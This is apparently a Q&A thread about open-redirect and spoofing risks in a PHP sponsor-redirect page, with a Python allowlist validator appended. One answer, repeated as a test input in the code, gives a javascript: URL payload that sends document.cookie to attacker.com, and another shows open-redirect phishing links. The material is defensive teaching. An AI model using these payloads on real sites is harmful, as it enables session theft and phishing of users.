I have a webpage that redirects to another webpage like this:

http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html

Then the Sponsor.php page displays an ad with a link saying "Continue to your page" that links to the passed in RedirectPage. Are there security/spoofing issues that could come from this? What is the best way to handle this? (note that the user is not logged in to either site)

A: 

This is definitely a security risk. You should avoid using in-URL variables when security is involved.

While nothing is totally secure, this is a much better way of handling this issue: http://www.webmasterworld.com/forum88/2910.htm

PHLAK
Just out of curiosity, why do you label this a security risk? The reason I ask is that the OP explicitly stated that there is no logon information at risk.
Chris Lively
A: 

If sponsor.php allows any value into RedirectPage AND ads imply an endorsement, or encourage people to think that they are on the right track, you would be opening it up to be part of a phishing attack. What's worse, you would probably be profiting from those attacks, which would likely make people rather displeased.

Keeping a list of permitted URLs (or patterns that they can follow) would go a long way to prevent problems.

acrosman
+8  A: 

It's a big problem. If I send you a link that looks like this:

 http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14

You're going to think "Oh, CNN, that's a legit site", and you'll open it and click the 'Continue to Your Page' link. And then you'll be on one of the nastiest porn sites on the net and it'll have a giant booming male voice announcing to all your co-workers "Hot Damn I Want to !@$@#$ Your !(&¤&^$§ until I can't ¡⌐^(!#~~&$^#!@$!!" and you'll have to explain to your boss "I thought it was CNN!"

The hole here is your reputation. Blind redirects like this are dangerous.

And that's just one hole. How about this?

 http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie

Now I've XSS-ed your site and stolen your user's cookies. Sure, you say there's no login info, but how about session data? Or when you add a login later, or someone else in your company uses this page a year later where users are logged in.

Tom Ritter
Excellent. :)
landon9720
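The two fixes the answers above point at, acrosman's allowlist of permitted destinations and the rejection of non-http(s) schemes that Tom Ritter's javascript: example calls for, as a single added Python example. This is not the OP's PHP or any code posted in the thread; the allowed hosts, the fallback URL and the sample inputs (including the two attack URLs from Tom Ritter's answer) are constructed for illustration. The check is done on the parsed scheme and hostname, not on a substring of the raw string, so "http://mylink.com@evil.example/" and "//evil.example/" fail it too.

```python
"""
Validate a RedirectPage-style parameter against an allowlist before using it
in a "Continue to your page" link. Illustrative Python, not the OP's PHP.
"""
from html import escape
from typing import Optional
from urllib.parse import urlsplit

# Constructed allowlist for this example: the only destination hosts the
# sponsor page is willing to send visitors to. mylink.com is the OP's
# destination; the www variant is an assumption.
ALLOWED_HOSTS = {"mylink.com", "www.mylink.com"}
ALLOWED_SCHEMES = {"http", "https"}

# Where to send the visitor when RedirectPage fails validation (assumed).
FALLBACK_URL = "http://www.myOtherServer.com/"


def safe_redirect_target(candidate: Optional[str]) -> str:
    """Return `candidate` unchanged if it is an http(s) URL to an allowed
    host; otherwise return FALLBACK_URL. Arbitrary input is never reflected."""
    if not candidate:
        return FALLBACK_URL
    parts = urlsplit(candidate.strip())

    # 1. Scheme allowlist: one check rejects javascript:, data:, vbscript:,
    #    file: and the scheme-relative form "//evil.example/" (empty scheme).
    #    urlsplit lower-cases the scheme, so "JAVASCRIPT:" is caught as well.
    if parts.scheme not in ALLOWED_SCHEMES:
        return FALLBACK_URL

    # 2. No userinfo: "http://mylink.com@evil.example/" parses to hostname
    #    evil.example, but rejecting credentials outright also removes the
    #    look-alike trick from the visible URL.
    if parts.username is not None or parts.password is not None:
        return FALLBACK_URL

    # 3. Host allowlist on the parsed hostname (lower-cased, port removed),
    #    never on "does the string contain mylink.com".
    if parts.hostname is None or parts.hostname not in ALLOWED_HOSTS:
        return FALLBACK_URL

    return candidate


def build_continue_link(redirect_page: Optional[str]) -> str:
    """HTML for the sponsor page's link. The target is validated first and
    then attribute-escaped so it cannot break out of the href."""
    target = safe_redirect_target(redirect_page)
    return f'<a href="{escape(target, quote=True)}">Continue to your page</a>'


if __name__ == "__main__":
    # Constructed inputs: the OP's legitimate URL, the two attack URLs from
    # the answers above, and a few parser-confusion variants.
    samples = [
        "http://mylink.com/whereIwasgoingtogo.html",
        "http://bit.ly/jh2l14",
        "javascript:location.href='http://attacker.com/' + document.cookie",
        "//evil.example/",
        "http://mylink.com@evil.example/",
        "HTTPS://WWW.MYLINK.COM/page?x=1",
    ]
    for s in samples:
        print(f"{s!r:72} -> {safe_redirect_target(s)}")
    print(build_continue_link(samples[0]))
```

An even simpler design, if the set of destinations is fixed, is to pass an opaque ID (RedirectPage=3) and look the real URL up in a server-side table; then no URL from the request is ever parsed or echoed at all.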